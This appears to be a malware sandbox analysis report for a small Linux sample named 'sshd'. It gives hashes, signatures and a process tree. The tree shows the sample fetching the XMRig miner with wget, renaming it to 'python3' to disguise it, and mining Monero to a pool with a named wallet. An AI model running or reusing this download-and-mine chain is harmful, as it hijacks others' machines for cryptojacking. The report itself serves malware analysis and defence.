Resubmissions

20-01-2025 17:41

250120-v9nxya1mcx 10

20-01-2025 17:38

250120-v73y3s1lex 10

Analysis

  • max time kernel
    0s
  • max time network
    48s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    20-01-2025 17:38

General

  • Target

    sshd

  • Size

    496B

  • MD5

    bde8eb67612ae4246e358fc8a75e4f04

  • SHA1

    d1e03cf4130281b525f8a5d51abc3c3917c58d58

  • SHA256

    986b11952fe8b5764c39bc39ab3656b4f3b14c331cf32cfea6d8b0079c81e5f3

  • SHA512

    ac62ad5f3628caef1f68a4ead799e234cb440c321a51ea589e442ceee6b24ce3f56b4c958e770abb4b7ddfbed8c731cd801b58f3ce68011b53c3b8c46688eb28

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sshd
    /tmp/sshd
    1⤵
      PID:1512
      • /usr/bin/wget
        wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz -O sshd.tgz
        2⤵
        • Writes file to tmp directory
        PID:1513
      • /bin/tar
        tar -xf sshd.tgz
        2⤵
        • Reads runtime system information
        PID:1514
        • /usr/local/sbin/gzip
          gzip -d
          3⤵
            PID:1518
          • /usr/local/bin/gzip
            gzip -d
            3⤵
              PID:1518
            • /usr/sbin/gzip
              gzip -d
              3⤵
                PID:1518
              • /usr/bin/gzip
                gzip -d
                3⤵
                  PID:1518
                • /sbin/gzip
                  gzip -d
                  3⤵
                    PID:1518
                  • /bin/gzip
                    gzip -d
                    3⤵
                      PID:1518
                  • /bin/rm
                    rm sshd.tgz -fr
                    2⤵
                      PID:1519
                    • /bin/mv
                      mv xmrig-6.22.2 sshd_common
                      2⤵
                      • Reads runtime system information
                      PID:1520
                    • /bin/mv
                      mv xmrig python3
                      2⤵
                      • Reads runtime system information
                      PID:1521
                    • /tmp/python3
                      ./python3 -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:47zqPD9abK85U1mLET6U3ZPAUGEWg45fiGSacihNC2kP2SQvsbqTdwY5QgRpssfSfHhHP4JhPRZ8KZPuLq4jwqSMEZtsN4q.linux4462 -p crypter
                      2⤵
                        PID:1523

                    Network

                    MITRE ATT&CK Matrix

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads